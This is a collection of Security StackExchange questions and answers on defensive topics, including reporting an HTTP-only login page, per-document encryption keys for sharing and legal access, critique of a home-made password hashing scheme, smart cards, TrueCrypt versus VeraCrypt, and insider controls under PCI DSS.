71,905 | I just discovered that my university alumni's login page is just plain HTTP. Wireshark confirmed that the credentials are sent using an HTTP POST message. I did a bit of research and, as I thought, HTTPS should always be used on the login page (See Is it secure for a site to serve the login page with HTTP, but have the actual site in HTTPS? ). First of all, I'd like to do my university a favour, but how can I make them to take some actions? It's highly probable that my personal data, such as degree and year graduated, is store on the alumni database. It's not surprising that some organizations don't take such a report seriously (See How do I report a vulnerability to a large organization that doesn't believe it has a problem? ). I've emailed the university's IT helpdesk using my alumni email account, but the personnel asked me to direct my inquiry to a general alumni inquiry email. On top of the technical details, how can I make sure that no police will arrest me for hacking? I have not attempted to steal any personal information. I am not interested to report this vulnerability to some security forum before the university takes some action. P.S. I'm embarrassed that my CS degree was from that school. | Simply reporting that it is using HTTP rather than HTTPS for login and that that is insecure shouldn't get you accused of hacking. It is something immediately publicly visible from looking at the site. There are many ways of detecting vulnerabilities which could actually be considered hacking (for example, running a vulnerability scanner against a target you aren't authorized to run it against), but I'm not aware of any jurisdictions that would consider looking at the page and recognizing a flaw that is immediately visible to be hacking. It would be a bit like walking by a house, noticing that someone was leaving their door open when they were leaving and being accused of being a thief when you pointed out to them they left the door open (while you aren't even standing on their property.) | {
"source": [
"https://security.stackexchange.com/questions/71905",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
71,911 | Current setup We have a service that allows users to upload documents through a website and stores the uploaded documents encrypted on disk. The documents on disk are encrypted with a per-user key, which is randomly generated upon account creation. This document key is stored in a database field which is encrypted with the user's password as the key.
When the user (owner) want to download a document, they need to provide their password, which is used to decrypt the document key which is in turn used to decrypt the document. We have chosen this pattern to negate the need to re-encrypt all encrypted documents when the user chooses to change their password: we only need to re-encrypt the document key. This setup work fine (and we think it is a secure pattern 1 ). Required changes Unfortunately, we have two new requirements to implement. By law, we are required to be able to decrypt any documents we have on disk, upon request by the government; Someone has decided that the owner of a document should be able to share the uploaded document with other users. I don't know how to implement those requirements while keeping the documents stored with per-user encryption. So, my question is: Is there a known pattern that allows for encrypting documents so that they can be decrypted by one or more parties, where the parties in question are to be determined upon document encryption? Update : Some background information on the law mentioned above: In fact, the law does not state that we are required to build in a back door. The law makes it a criminal offence to not hand over the key to any encrypted data you have 2 if the police requests the key 3 . A result of this is that we who host the data need to have a back door, or face prosecution in case we cannot decrypt the data when requested. However, other than in some other countries, we are free to communicate the fact that we received an order to decrypt documents. These laws are unfortunately not uncommon . Informing our customers and the public: As I indicated in a comment before, I fully intend to pull my weight to makes sure this policy is clearly communicated to our customers. Privacy statements need be changed and TOS need to be updated. Public awareness on the one hand and making sure 'bad laws cost money' on the other, are the best method I have available to protest against such laws. However, at the same time I'm kinda sceptical about the impact of such statement. Most people simply don't care. At the same time, many people use their email and inbox to store and share documents. So from that perspective our service is (still) a huge improvement (and it is the reason some of our customers require their employees to use it). 1. If there is a glaring hole in this method, feel free to comment on it. 2. Lawyers have figured that 'data you have' is meant to include all data stored on physical devices you own (I'm not a lawyer, so this my lay-persons translation of what they concluded). 3. Yes, not some fancy security office, but police. There are some safeguards in when they can request password, but that doesn't change the implications of this law. The big question is what happens when you truly forgot the password to some data. The minister has indicated that it is the responsibility of the owner of such encrypted data to then delete it. But no such case has yet (as to my knowledge) been tried in court. | You need a per-document key, not a per-user key. Well, you also need per-user keys, but that is another matter. Namely, each document D is encrypted with a key K D . That key is generated randomly the first time the document is imported in the system. Each document has its own key. The key for a document cannot be inferred from the key on any other document. Each user U also has a key K U . 
Therefore, if you need document D to be accessible to users U, V and W, then you store E_KD(D) (the encryption of D with the document key), along with E_KU(K_D), E_KV(K_D) and E_KW(K_D) (the encryption of key K_D with the keys of users U, V and W). These "encrypted keys" have a small size (a few dozen bytes, regardless of the document size) so this scales up. To make things more practical, you may need to use asymmetric encryption for user keys: encryption of D uses a convenient symmetric system (say, AES), but the "user keys" will be of type RSA (or another similar algorithm like ElGamal). That way, if user U wants to share the document D with user V, then he: retrieves E_KU(K_D) from the server; uses his own private key to decrypt that and recover K_D; encrypts K_D with V's public key, yielding E_KV(K_D). The beauty of this scheme is that V need not be present for this procedure, since only V's public key is used. At that point, what you really have is OpenPGP, a format meant primarily for secure emails. Emails have this "sharing property" (an email may be sent to several recipients) and are asynchronous (when you send the email, the recipient is not necessarily available right away). You would be well advised to reuse OpenPGP, a format that has been reviewed by many cryptographers, and for which implementations already exist. When you have a sharing mechanism, you can simply put yourself as an implicit recipient for every document, and you can read everything. Regardless of law requirements, be sure to notify users through the "usage conditions" that you can technically read everything; otherwise they may sue you for lack of warning. | {
"source": [
"https://security.stackexchange.com/questions/71911",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53887/"
]
} |
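A minimal sketch of the per-document key scheme from the answer above, using Python's cryptography package: each document gets its own random symmetric key, and that key is wrapped once per authorized recipient (including the operator's own "escrow" key, which is what satisfies the lawful-access requirement). The answer's actual recommendation is to reuse OpenPGP rather than hand-roll this; the key sizes, padding choices and names below are illustrative assumptions.

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Each user has an RSA key pair (the private keys stay with the users).
users = {name: rsa.generate_private_key(public_exponent=65537, key_size=2048)
         for name in ("U", "V", "W", "escrow")}   # "escrow" = the operator's own key

# One random key per document (K_D), used to encrypt the document itself.
doc_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)
ciphertext = AESGCM(doc_key).encrypt(nonce, b"contents of document D", None)

oaep = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()), algorithm=hashes.SHA256(), label=None)

# Wrap the document key once per authorized recipient: this is E_KU(K_D), E_KV(K_D), ...
wrapped = {name: key.public_key().encrypt(doc_key, oaep) for name, key in users.items()}

# Any recipient recovers the document using only their own private key.
recovered_key = users["V"].decrypt(wrapped["V"], oaep)
assert AESGCM(recovered_key).decrypt(nonce, ciphertext, None) == b"contents of document D"

Note that sharing with a new user later only requires wrapping the small document key again, never re-encrypting the document, which is exactly the property the answer describes.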
71,934 | This is going to get long, so prepare. Basis of the question is, Do all these steps improve security, or am I completely overthinking the problem? Are my assumptions/thought process valid? We all know there are many types of attacks a hacker can use to infiltrate a system, however, this deals with password hashing, so I am going to ignore other attacks
like injections, etc. As far as I'm aware, there are 2 types of attacks that good password hashing can help prevent: offline brute-force attack and offline rainbow table attacks.
In order to perform these, however, the attacker must first obtain access to the user-password file, where the passwords are stored as hashed versions, not plain text. A brute
force attack involves guessing the user's password many, many, many times until the password he guessed matches the hashed password in the file. If you hash chain, the attacker
must keep guessing down the chain, checking against the hashed version at that level until he arrives at the original password. Rainbow attacks are similar, but instead of guessing,
the attacker uses a lookup table of pre-computed hashes based on commonly used passwords, words, and common variations. Rainbow attacks can be thwarted by using uncommon passwords
or salts (password prefixes) which would not be contained in a pre-computed table. Instead, the attacker would have to compute this table on the fly which takes much, much longer.
We can never prevent the attacker from guessing the password and checking to see if it is correct, but we can make it harder on him by making him guess many more times. We do this
by chaining hashes so that whenever the attacker cracks the i'th hash, he must then repeat the process for the (i-1)th hash. However, if the attacker knows how many times we hash
the password, this is mostly moot (see NOTE2). Anyway, on to the code: function createHashedPassword(char[] username, char[] userPassword)
{
char[] secretCompanyString = "Some Secret Company String Only Visible via Source Code";
char[] companySalt = hash_sha512(secretCompanyString+username); //NOTE1
memset(secretCompanyString[0], 0, sizeof(secretCompanyString)); //remove secretCompanyString from memory
char[] userSalt = salt_generator_512();
char[] hashedPassword = userSalt + hash_sha512(companySalt+userSalt+userPassword);
memset(userPassword[0], 0, sizeof(userPassword)); //remove userPassword from memory
int NumIterations = 4242+userPassword.length; //DOES MAKING THIS NUMBER PRIVATE/PASSWORD-DEPENDANT ENHANCE SECURITY? SEE NOTE2
for(i=1;i<NumIterations;i++) //NOTE3
{
userSalt = salt_generator_512() + userSalt; //SHOULD I BE USING A NEW SALT EACH TIME? SEE NOTE4
hashedPassword=userSalt+"$"+hash_sha512(companySalt+userSalt+hashedPassword);
}
NumIterations=0; //Remove number of iterations from memory
memset(companySalt[0], 0, sizeof(companySalt)); //remove companySalt from memory
return "$6$"+hashedPassword;
} Note1: I believe that this is better than companySalt=secretCompanyString , because if a user can brute force his way into the top level of the chain (i.e. finding that companySalt+userSalt+hashedPassword leads to hashedPassword ), he would see that it was in the form of companySalt+userSalt+hashedPassword , and
the companySalt would no longer be secret. However, being user dependant, he would not be able to use it to help crack other passwords. He could then attempt to brute force
his way into figuring out that the companySalt => secretCompanyString+username , but that would involve yet another (long) brute-force attack. NOTE2: I believe making the number of iterations private would help a great deal because if the attacker knew how many iterations we use, all he would need to do is guess a password, hash it
N times, and then check the result against the hash, instead of having to crack the umpteenth hash, and then have to work his way down the chain until he arrives at the password.
If this value was public, I don't believe it would be any more secure to hash chain than it would be to only hash the password once. Am I right in thinking this? In terms of the
second point, making the number of iterations password dependent should enhance security against brute-force attacks. Assume a user of the site gains access to
the password file. He knows his username, password, and public salt. He can then brute force his way into getting the companySalt and number of iterations (assuming he knows
that we use a company salt and chain hashing scheme). With that information, it would be easier , but still not easy, to then brute-force his way into another user's
account. However, if the companySalt and/or number of iterations changes from user to user, this information would gain him nothing. Making it private/user dependant, I believe,
should help prevent brute force attacks, not rainbow table attacks. This leads me into NOTE3. NOTE3: I know we are supposed to hash chain, but why does this increase security? To slow down brute-force attacks by a factor of N? I'd assume it would also make using
Rainbow tables infeasible because the rainbow table would have to contain all N entries, which would be practically impossible / impractically large. NOTE4: After the attacker figures out we are using a company salt and brute forces his way into his first level, he would have built a huge table with guesses in the form of "companySalt+userSalt+XXXXXXX" . If we used the same salt over and over, there is a possibility (however small) that in the process of guessing one link in the chain, he
has already calculated a hash for another level. When he gets to that level, he can simply use his lookup table. But by pre-appending a new salt to the old salt each time,
it breaks that pattern and makes it impossible for him to have already guessed that hash. He will have to start building the table from scratch. I am pre-appending here so that
I can keep track of the hashes I used to make password checks possible. I am expecting to get a bunch of answers discussing the inefficiency of the hashing algorithm (how long it takes, how much memory it will take to store the hashes, etc), but assuming I have a supercomputer w/ 800 petabytes of storage, and all I care about is maximum security, would all these steps help? | This basically looks like something along the lines of PBKDF2 or sha512crypt, only with a bunch of "cryptographic voodoo" applied. Salts have a very specific cryptographic purpose: to tie an password-guessing attempt to a single password instance. Having company-specific salts, user-specific salts, per-iteration salts, and (to steal a snark ) hand-harvested, shade-grown, organic pink Himalayan salts are unnecessary and have poorly-defined (or undefined) security properties. While this doesn't necessarily create a weakness, in general, one should use the absolute minimum amount of cryptography necessary to solve a particular problem. Having a variable number of iterations likewise doesn't improve anything. In the best case, all an attacker has to do is compare the hash after every iteration. While yes, this is slightly more work, it doesn't change the big-O complexity of cracking the password hash. In the worst case, the attacker knows the algorithm and so this does nothing to improve security. As always, Kerckhoff's principle is apropos: assume the attacker knows everything about your cryptosystem besides the key. In some ways, your hashing scheme is overengineered. In other ways, it's underengineered. For instance, the Catena password hashing function is one of the leading contenders for the PHC , an open competition attempting to spur the development of next-generation password hashing schemes and to choose one for the industry to standardize upon. It has several features yours lacks. They recommend (based on my suggestion, actually) the use of BLAKE2b as the internal hashing function. This is a superior choice to SHA-2/256 or SHA-2/512 for most typical password-hashing scenarios, as BLAKE2b is as fast to compute in general-purpose hardware (e.g., typical server CPUs) as it is in specialized hardware (GPUs, FPGAs, or ASICs). This minimizes any advantage an attacker has over a defender, by ensuring that the defender can calculate a password hash roughly as fast on server hardware as a motivated attacker can do with dedicated password-cracking hardware. Memory-hardness is another advantage of Catena. The point of doing a large number of iterations is to require a significant amount of work to compute a single password guess; this helps offset the relatively low amount of entropy in a typical password. However, modern algorithms do better than that. They can require a tunable amount of memory to compute a password hash. This can be an extremely effective defense against specialized multicore hardware. High-end GPUs (like the AMD FirePro D-Series can have thousands of cores. The D700, for example, has 2,048 cores and only 6GB of memory. If it requires 32MiB of memory to attempt a single password hash, the attacker can at best only use 192 of those cores. They also may be limited even moreso by memory bandwidth, slowing down cracking attempts further. A particularly challenging component of this type of feature is ensuring there are no favorable time-memory tradeoffs, where an attacker can reduce the memory requirement by using more CPUs (Catena has formal a proof of this feature). 
Catena can also be used to increase the hardness parameters after the password has been hashed, without requiring the original password. This allows a site operator to dynamically increase the difficulty of hashing passwords as computers get faster, even for users that haven't been recently active. There are other features that password-hashing schemes can implement that yours doesn't (or attempts to, poorly). Your approach to a company-specific salt appears to be an attempt to strongly tie a password hash to a secret. Much more cryptographically sound is to require a cryptographic key as input to your hashing function, and to HMAC the password with the secret key prior to running it through the iterative hashing. This ensures that the output cannot be computed by an attacker without getting access to a key. Storing this secret in your source code directly (as you suggest) is a security antipattern, as it grants access to this secret to any employee, contractor, or service with read privileges to your source code (e.g., GitHub or Travis CI). Lastly, your scheme uses has poor cryptographic "hygeine" (for lack of a better term). Simply concatenating strings being input to hash functions is, while in this case not necessarily broken, a cryptographic antipattern. Cryptographers tend to prefer constructs like HMAC when combining secret data and user input, and prefer unambiguous encodings when combining multiple inputs (e.g., to disambiguate between H("test1" + "test2") and H("test" + "1test2") ). These avoid some attacks against many classes of hashing functions, and while they may not be strictly necessary in this case cryptographers tend to be very conservative when it comes to allowing any potential source of attack, even if it's not currently obvious how it could be exploited; seemingly minor oversights in cryptographic protocols are exploited all the time. TL;DR, password hashing is complicated. Don't roll your own. For now, use bcrypt, scrypt, or PBKDF2. And yes, you are definitely rolling your own even if you're not writing your own hash function; you're writing (effectively) a key derivation function, which is arguably a much harder cryptographic problem. As Thomas Ptacek once said : I don't care what you write, but if you go into it thinking that the dangerous stuff is in the primitives like the AES core, and if you just stick to the glue you'll be safe, you're gonna have a bad time. EDIT: To address your additional questions below: The only purpose of a salt , cryptographically speaking, is to ensure that two identical passwords hash to different results. This tightly binds a password-cracking attempt to an specific hashed password, rather than to the password database as a whole. This should be the case even if you consider "the password database" to be the merged set of all hashed passwords across all systems globally — the work to crack one password should never be reusable to crack another person's password. Given this definition of a salt, it should be clear that company-specific "salts", user-specific "salts" (e.g., one bound to a specific user rather than to the password itself), etc. are not in fact salts but are something else of your own invention. Storing one large, globally-unique salt (e.g., a randomly-chosen 128-bit value) is enough to ensure global uniqueness of that password. Likewise, continually hashing the salt into each iteration does not contribute in any meaningful way toward the expected function of a salt. 
Hashing it in at the beginning is enough to ensure that an attacker cannot reuse any of the computation to attempt other passwords. That said, there is benefit in hashing something additional in at each step. A theoretical weakness of iterated hashes is their ability to enter what's called a "short cycle". Essentially, we know that hashes have collisions (it's just impractically/impossibly difficult to find them). If you were to run a value through a 128-bit hash 2^128+1 times, you are guaranteed to have generated at least one collision (as you've enumerated the entire output space); this would put you into a cycle, where each successive hash output is the same as the previous time you hashed that value. However, statistically, it's expected that you do not need to go through all 2^128 values to generate a cycle; it's entirely plausible that there's some x such that x = H(H(x)) . Or more generally, some x and n < 2^128 such that x = H^n(x) . This is a short cycle. To prevent a short cycle, we need to ensure that each invocation of the hash is guaranteed to be unique. A trivial way of doing this is including the iteration counter in the inputs to the hash; e.g., H(x || i) . We don't know that x will be unique for each iteration of the hash, but we do know that i will be. This doesn't negate the possibility of a collision in hash outputs at some step, but if a collision does happen, we know that the next iterated output is still overwhelmingly likely to be unique. | {
"source": [
"https://security.stackexchange.com/questions/71934",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36971/"
]
} |
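To make the recommendation in the answer above concrete -- HMAC the password with a real secret key kept outside the source code, then feed the result to an established password hash such as bcrypt -- here is one hedged Python sketch. The environment-variable pepper and the third-party bcrypt package are assumptions for illustration; this shows the pattern, not a vetted design.

import hashlib
import hmac
import os

import bcrypt  # third-party package: pip install bcrypt

# The "pepper" is a real cryptographic key kept out of the source tree
# (environment variable, KMS or HSM), unlike a string hard-coded in the code.
PEPPER = os.environ["PASSWORD_PEPPER"].encode()

def hash_password(password: str) -> bytes:
    # Keyed HMAC first; hex-encode so the digest is safe to hand to bcrypt
    # (no NUL bytes, and well under bcrypt's 72-byte input limit).
    keyed = hmac.new(PEPPER, password.encode(), hashlib.sha256).hexdigest().encode()
    return bcrypt.hashpw(keyed, bcrypt.gensalt(rounds=12))  # salt and cost handled by bcrypt

def verify_password(password: str, stored: bytes) -> bool:
    keyed = hmac.new(PEPPER, password.encode(), hashlib.sha256).hexdigest().encode()
    return bcrypt.checkpw(keyed, stored)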
71,996 | I recently installed Bitlocker on my Windows 8.1 machine, using only a password. I was thinking of getting something other than just a password for my storage drive, something physical, like a USB, SD Card, or Smart Card! I've asked and poked around, and people claim the following: When given the choice of a Smart Card and another storage medium for 2FA, or regular authentication, go for the Smart Card, as it is safer. I can't really find why it would be safer, an encrypted SD Card switched to "read only" with the side switch would just be as safe as the Smart card, correct? (That is to say, a USB drive can be overwritten by Malware, etc.). Is this advice accurate? Why or why not? Is a Smart Card indeed safer? | A smart card works by keeping a secret hidden and answering a challenge that proves it has the secret. It, theoretically, should never reveal that secret to anyone and it should be unrecoverable. There are some technical ways you might be able to get around it, but most of them are destructive to the card. This means you know if your smartcard has been compromised. An encrypted USB drive or memory card on the other hand can simply be copied. There is no mechanism protecting it from being cloned by an attacker. There are some USB sticks that do provide hardware protection to prevent unauthorized access and these would make a more viable option, but it would be a toss up as to whether even those were as well protected as a good smartcard. | {
"source": [
"https://security.stackexchange.com/questions/71996",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45233/"
]
} |
72,015 | First of all, I'm sorry if this has been discussed many times. I read many posts about PCI compliance but there are some small things I'm not quite sure about. Suppose there is Mr. GoodGuy, an honest software developer. He develops the main software architecture, and the company trusts him and gives all the access he reasonably need. This software stores credit card numbers for recurring payment management, and software uses a credit card gateway to charge the renewal amount. Mr. GoodGuy could write some code that would decrypt the card for a user, no matter what level of security the software has (encryption key in a secured server location, per-user keys, or anything), the software itself can somehow decrypt the card data. That means, even though the developer is honest, he could access card data. What are the possible solutions that other companies have implemented that prevents someone from using the software to access card details? This is not really about card details. It can be anything like online file storage services, medical data, or anything. How can a developer can make sure he won't be able to access the data as he wants, but make it possible for software to to access them (without user participation) PS: I'm Mr. GoodGuy here and I have no intention do anything bad. I'm wondering how other companies deal with this. Do they trust the developers? Even if he's resigning, he can take the key file with him. Flushing all stored cards is not an option here either since it can send many existing sales off. | PCI DSS sections 6, 7, and 8 all bear on this question. For example, part of 6.3.2 which requires code review: Code changes are reviewed by individuals other than the originating
code author, and by individuals knowledgeable about code-review
techniques and secure coding practices. 6.4 with change control: A separation of duties between personnel assigned to the
development/test environments and those assigned to the production
environment. 7.1 controlling access... in many environments the developer who writes code never accesses the operational systems where it's used with live data: Limit access to system components and cardholder data to only those
individuals whose job requires such access. And a touch of 8.7 to put restraints on those people with access: Examine database and application configuration settings to verify
that all user access to, user queries of, and user actions on (for
example, move, copy, delete), the database are through programmatic
methods only (for example, through stored procedures). Now, that all said, can a trusted insider ever be perfectly defended against? No, because of the very definition of "trusted". This is true in all places (how many spies have been "trusted"? John Anthony Walker comes to mind.) But there are best practices for defending against such a threat, for mitigating them, and the PCI DSS formalizes as requirements a number of these practices (for credit cards... other secrets are on their own!) (And @Stephen-Touset points out, 3.5.2 requires: Store secret and private keys used to encrypt/decrypt cardholder
data in one (or more) of the following forms at all times: And one of those ways is: Within a secure cryptographic device (such as a host security module
(HSM) or PTS-approved point-of-interaction device) Which has the advantage of escrowing the actual key material away from day-to-day users and administrators.) | {
"source": [
"https://security.stackexchange.com/questions/72015",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8411/"
]
} |
72,091 | Is it fundamentally possible to validate that an unmodified version of your client connects to your server? I was just thinking about the idea of having my client-side app hash its own source code and sends that as a key to the server with any requests as proof that it's unmodified, but that's silly because anyone could just have the client send a hash of the unmodified version via a modified version. I was wondering if there might be a secure way to do this though, via some sort of proof that the client was unmodified. | It is fundamentally impossible to validate a client on a system you don't control. That doesn't mean it can't be done to a sufficient degree. eBook readers, for example, generally try to ensure the client is authentic. They (seem to) do so in a manner that is secure enough to defend against their threat. Good enough to protect nuclear secrets? No. But good enough for their threat environment. Figure out how important that control is for your application, and determine the compensating controls you'll put in place to limit the damage when someone goes through the trouble of ripping apart and then mimicking your application. Don't think in terms of black/white, possible/impossible; think in terms of acceptable and achievable security. | {
"source": [
"https://security.stackexchange.com/questions/72091",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/81923/"
]
} |
72,230 | I am located in Venezuela right now, and for the whole weekend have been unable to access grubhub.com and seamless.com. Finally, I tried using the Tor Browser and got access. The same thing happened in January when I tried to access the police department's website in a New York State county when I was abroad. Is this a measure to avoid hackers? Or do they do it to avoid spending bandwidth in countries where the website doesn't serve the population? | Country-based blocking is usually put in place as a result of some organisational policy whose intention is indeed to "block hackers". This sort of things fail on three points: Such a policy assumes that malicious people can be categorized by nationality. This is old-style, World-War-I type of thinking. Geographical position is immaterial for computers; a firewall can only see IP addresses . Inferring geography from IP addresses relies on big tables that are never completely up-to-date. As you observed, working around these blocking systems is trivial for attackers; it suffices to use a relay host outside of the blocked country, and this happens "naturally" when using Tor. Most attackers will use such relays anyway, to cover their tracks. So the usual net effect of such a blocking is to irritate a few normal users (who might have been customers, but will not now that they are angry), without actually impeding the efforts of competent attackers. On the bright side, though, "country"-based blocking is sometimes put in place to prevent thousands of mindless drones from spamming the connection logs. For instance, the sysadmin might have noticed a surge of dummy connections from some botnet, most machines of which being located in Venezuela. In that case, blocking Venezuela altogether may help prevent the clogging of log files, while implying only minor impact on business (assuming that the server in question has very few honest Venezuela-based customers). Thus, it is conceivable that a risk/cost analysis has determined that such a large blocking would improve things. However, in most cases, the "country blocking" is there for the show: a whole-country blocking helps sysadmins demonstrate to managers that they are doing something for security, in a way that managers readily understand. This is the usual predicament of security: when all things work well, security is invisible. It is unfortunately hard to negotiate budgets for activities that don't imply any visible result. Even though the whole point of security is to avoid having visible results, e.g. a defaced Web site or a list of 16 millions of user passwords leaked and hitting the news. In the case of media distribution, some distributors enforce country-based blocking because they did not have whole-World retransmission rights, and by doing a modicus of blocking effort they fulfil their legal obligations. Arguably, this case is also "for the show". | {
"source": [
"https://security.stackexchange.com/questions/72230",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60097/"
]
} |
72,249 | I am looking to encrypt a few drives of mine, and my ONLY interest is security. It is OK if my VeraCrypt volumes are not compatible with TrueCrypt, and vice versa. There is a lot of talk about "TrueCrypt is dead" and it seems there are two forks out there now gaining momentum. The one more interesting to me is VeraCrypt, and from the research I have done, this looks like the "more secure" option. But is that so? That is why I am asking you all here. I know what VeraCrypt claims, I know they say they do more hash iterations of the password to derive the encryption keys. That sounds nice and all, but... Does anyone have real world experience using Veracrypt and is it as good as advertised? How does it compare to TrueCrypt? Does anyone have a security reason why they would choose TrueCrypt over VeraCrypt? Any reasons at all why TrueCrypt is preferable to you? I'm not on the "TrueCrypt is dead" bandwagon, I am just in trying to be progressive, so I would choose a newer "better" option if it is available. But with that being said, I would also choose to go with the older option if it is actually better than the newer options. Your thoughts? | I would still choose TrueCrypt for a matter of trust and the "many eyes" theory: After the "TrueCrypt scandal" everyone started looking at the source for backdoors. The TrueCrypt audit finished on April 2, 2015. They found low-risk vulnerabilities, including some that affect the bootloader full-disk-encryption feature, though there is no evidence of backdoors. If VeraCrypt start changing TrueCrypt fast, they may introduce a few vulnerabilities. Since VeraCrypt is currently less popular than TrueCrypt, there are 'less eyes' watching at the VeraCrypt source code changes. I consider that TrueCrypt 7.1a have all the features I need. An audited TrueCrypt with the vulnerabilities fixed would be the perfect choice. Unless I personally watch VeraCrypt source code diffs, it would require an audit on the changes, or a high increase in popularity, or many years of maintenance and active community to make me trust them more than the good old TrueCrypt. The increase in iterations to mitigate brute force attacks only affects performance. If you chose a 64-char random password, 1 million years of brute forcing or 10 million years is the same from a security stand point. (I downloaded the public key of TrueCrypt admin years before the scandal. So I can download a copy of TrueCrypt 7.1a from any source and verify its authenticity) This answer may change after they publish new results from the audit. Also, if you are the VeraCrypt dev, the trust argument doesn't apply (because you trust yourself). | {
"source": [
"https://security.stackexchange.com/questions/72249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60112/"
]
} |
72,343 | Most of websites that handle important information (Gmail, for instance) have some kind of brute force protection. Sometimes if you try more than X times it will lock the account or at least give you a captcha to solve. Currently all the security experts keep saying the same thing: make long, mixed chars, high entropy passwords. This makes a lot of sense if you think about a RSA key, or something that could be decrypted offline, but is it really important when we talk about online account passwords? For example, we create a password for Gmail using only 6 letters from the english alphabet. This is approximately 26^6 = 309 million combinations. If we consider that we can test 1 password per second (which I think is faster than we actually can, if you take into account the Gmail captchas), we will need up to 10 years to break and 5 years on average. Points to consider: If you use the same password on different website, another website could be hacked and you password exposed. I'm assuming that the password is unique. Used only with Gmail. If somebody can grab the database they could brute force the hash of your password offline. I'm assuming that the website uses at least a salted hash (very unlikely that the hacker will try to break all passwords) and/or is very unlikely that the database will be hacked (it's a fair assumption with Gmail) I am also assuming that your password is not a dictionary word or something easy to guess. This should rule out multiple account brute force (eg. testing the same common password across multiple accounts). Is it safe to assume that we don't need a really long password to websites as soon as we follow the other security measures?
If we suggest that people use a long password just because they normally don't follow the other security advice (use same password across accounts, etc). Aren't we really trying to fix the symptoms and not the cause? PS: Some other questions address almost the same thing, but the answers always consider that the person is using the same password across websites or that the website database is easily stolen. | The following doesn't really do this justice, but in summary... In an ideal world no, complicated passwords should not be required for online resources. But, in that ideal world we are dependent on the administrators of the system to harden systems to prevent unauthorised access to the 'password file', the following will minimise the risk: Securely configure the infrastructure; Apply patches promptly; Have some form of monitoring to identify a compromise in the event of a zero-day exploit scenario (so that users can be 'told' to change their passwords); Have and follow 'secure' programming/development methodologies; Only employ trustworthy individuals. The complete combination of which is unlikely for many sites. Weaknesses in the above list may result in exploits that enable passwords to be bypassed altogether, but irrespective of the nature of a successful exploit it is a safe bet that, after gaining unauthorised access to a system attackers will attempt to exfiltrate the password file and subsequently brute force it to aid onward compromise of other systems (by exploiting password recycling). So while there is no guarantee that a strong(er) password will prevent all bad stuff, it can help to mitigate for weaknesses in providers' solutions (whether known or not). For the avoidance of doubt we are also dependent upon the service provider to do the following: Apply hashing and salting to passwords; Ensure the password is never exchanged in clear-text. I guess for most end-users the decision about password complexity and length will come down to the information the site (and therefore password) gives access to. My recommendation is: if it is something important use a complex password so that in the event of a system compromise other people's passwords are likely to be discovered first. But if it something trivial and convenience is more important take a chance on a weaker password, but accept that a hack could lead to loss of access to the account and/or release of information from the account. For many site owners I suspect the decision to require complex passwords is a combination of FUD and the desire to minimise the impact of a critical failure of controls by increasing the amount of time to brute-force passwords, thus giving longer to rectify and minimise actual user account compromise (although if an attacker has access to password hashes they probably have sufficient system access to compromise the system in other ways anyway). | {
"source": [
"https://security.stackexchange.com/questions/72343",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60220/"
]
} |
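The arithmetic in the question above, written out explicitly (the numbers are the question's own assumptions: a 6-character, lowercase-only password and one online guess per second):

keyspace = 26 ** 6                    # 308,915,776 possible 6-letter lowercase passwords
guesses_per_second = 1                # the question's assumed online guessing rate

seconds_per_year = 60 * 60 * 24 * 365
worst_case_years = keyspace / guesses_per_second / seconds_per_year
average_years = worst_case_years / 2

print(round(worst_case_years, 1), "years worst case,", round(average_years, 1), "years on average")
# roughly 9.8 years worst case and 4.9 years on average, matching the question's estimate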
72,498 | Usually, in programming, reusing code is always a better idea than writing your own implementation of an algorithm. If an implementation has been around for a long time and is still used by lots of projects, it is likely to be pretty well designed to begin with, have received plenty of testing and debugging, and perhaps most important someone else is in charge of maintaining it which means more time to focus on the specific software product that you are building. However, I was wondering if this principle still holds true for security-critical code, which performs tasks such as encryption and authentification, or which runs with high privilege for any reason. If one implementation of an algorithm is shared by lots of software systems, then there is a strong incentive for people to crack it, and when a flaw is found in it, it is likely to be a massive security disaster. Heartbleed and Shellshock are two recent examples that come to mind. And for closed-source examples, pick anything from Adobe :) Many different pieces of software sharing a single security-critical library also makes this library a target of choice for attackers wanting to insert a backdoor in it. In a large open-source project with lots of activity, a backdoor commit which also features plenty of other corrections (such as a code style cleanup) as a decoy is unlikely to be noticed. With all this in mind, is code reuse still considered a good practice for code doing security-critical tasks? And if so, which precautions should be taken to mitigate the aforementioned weaknesses of that approach ? | The important thing is maintenance . Regardless of whether you reused existing code or wrote your own, you will achieve decent security only if there is someone, somewhere, who understands the code and is able to keep it afloat with regards to, say, evolution of compilers and platforms. Having code without bugs is best, but in practice you must rely on the next best thing, i.e. prompt fixing of bugs (especially the bugs that can be leveraged for malicious usage, also known as vulnerabilities ), within a short time frame. If you write your own code, then the maintenance job relies squarely on your own shoulders. And that job can be very time-consuming. For instance, if you decide to write and maintain your own SSL/TLS library, and use it in production, then you must understand all the peculiarities of cryptographic implementation, in particular resistance to side channel attacks , and you must keep an eye on published attacks and countermeasures. If you have the resources for that, both in time and competence, then fine ! But the cost of maintenance must not be underestimated. Reusing an existing library, especially an opensource one that is widely used, can be quite cheaper in the long term, since maintenance is done by other people, and widespread usage ensures external scrutiny. As a bonus, you cannot be blamed for the security holes in an external library if half the World shares them. To sum up, the question is not really about code reuse, but about maintenance effort reuse. (I write all this independently of the great pedagogical qualities of writing your own code. I encourage you to do your own implementations -- but certainly not for actually using them in production. This is for learning .) | {
"source": [
"https://security.stackexchange.com/questions/72498",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60294/"
]
} |
